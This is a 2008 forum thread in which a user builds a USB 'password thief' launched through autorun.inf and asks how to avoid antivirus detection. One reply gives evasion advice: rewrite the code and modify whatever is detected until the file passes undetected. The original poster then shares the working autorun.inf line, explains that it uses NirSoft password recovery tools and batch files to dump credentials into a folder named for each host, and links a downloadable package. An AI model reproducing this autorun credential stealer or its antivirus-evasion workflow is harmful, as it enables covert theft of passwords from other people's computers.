Snip3r Posted August 31, 2008 Share Posted August 31, 2008 hey..Sup guy's.....??? i have some problems with my autorun.inf i coded a smal password thief...[like usb thief]....but my av detcted it....any suggestions??.. srry...im new in coding...it is a new project for me... thnxz in advance... grtz Quote Link to comment Share on other sites More sharing options...
snakey Posted September 1, 2008 Share Posted September 1, 2008 go home rethink your computer activites and come back Quote Link to comment Share on other sites More sharing options...
VaKo Posted September 1, 2008 Share Posted September 1, 2008 FFS you mupet, where is your source code, where is the history of troubleshooting steps you have taken? And where the hell is the actual information on the problem... you know, the stuff we can look at and go "well here's your problem". If you want help, fine, but at least tell us what the problem is beyond "I tried to make something to do x and it didn't work"... Quote Link to comment Share on other sites More sharing options...
Snip3r Posted September 1, 2008 Author Share Posted September 1, 2008 sorry guy's for my topic....ur right abt the info.... ok... i have this problem....when i want to test my thief, my av detect it as INF/autorun virus this is the autorunfile [autorun] action=Open Files On Folder icon=icons\drive.ico shellexecute=nircmd.exe execmd CALL batexe\progstart.bat is there a way to hide the autorun??...like with attrib?? Quote Link to comment Share on other sites More sharing options...
Steve8x Posted September 1, 2008 Share Posted September 1, 2008 sorry guy's for my topic....ur right abt the info.... ok... i have this problem....when i want to test my thief, my av detect it as INF/autorun virus this is the autorunfile [autorun] action=Open Files On Folder icon=icons\drive.ico shellexecute=nircmd.exe execmd CALL batexe\progstart.bat is there a way to hide the autorun??...like with attrib?? hiding the autorun.inf wont change anything... Get rid of the autorun.inf, and youll still be detected... it isn't the autorun.inf that is detected! it is the program your executing with it! nircmd? I'm not sure what that is but I don't think you coded it... As i've heard someone else talk about it before you... What you need to do is actually write your own source code. Then you shouldn't be detected, even if you are you can then modify the source easily and make it undetectable... what does this "password theif" actually do? take passwords from firefox + IE?(thats my guess) replicate what it does with code in a new project. Is this program packed? If not you can easily dissemble it and see the functions + API's it calls you shouldn't be using nircmd at all, it should say shellexecute=myprogram.exe Without source code your screwed. You need it to be able easily take code out(commenting code) and recompile it into a new exe. That's what helps you in determining what is detected and what is not. Code that is detected must be modified! Code that is not can be left alone. Quote Link to comment Share on other sites More sharing options...
Snip3r Posted September 2, 2008 Author Share Posted September 2, 2008 hiding the autorun.inf wont change anything... Get rid of the autorun.inf, and youll still be detected... it isn't the autorun.inf that is detected! it is the program your executing with it! nircmd? I'm not sure what that is but I don't think you coded it... As i've heard someone else talk about it before you... What you need to do is actually write your own source code. Then you shouldn't be detected, even if you are you can then modify the source easily and make it undetectable... what does this "password theif" actually do? take passwords from firefox + IE?(thats my guess) replicate what it does with code in a new project. Is this program packed? If not you can easily dissemble it and see the functions + API's it calls you shouldn't be using nircmd at all, it should say shellexecute=myprogram.exe Without source code your screwed. You need it to be able easily take code out(commenting code) and recompile it into a new exe. That's what helps you in determining what is detected and what is not. Code that is detected must be modified! Code that is not can be left alone. Thnxz m8... i allready fixed it........ here u have it...u have to do the same... Password Recovery Utilities Network Monitoring Tools Internet Related Utilities Command-Line Utilities Desktop Utilities Freeware System Tools http://www.nirsoft.net Using the autorun.inf, nirsoft programs and 5 bat files! Everything'll dumped in the folder Dump, with a foldername from that hostname. autorun.inf [autorun] action=Open Files On Folder icon=icons\drive.ico shellexecute=nircmd.exe execmd CALL batexe\progstart.bat http://members.lycos.nl/pih/bl00dburn3r/nirsoft_auto.rar enjoy Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.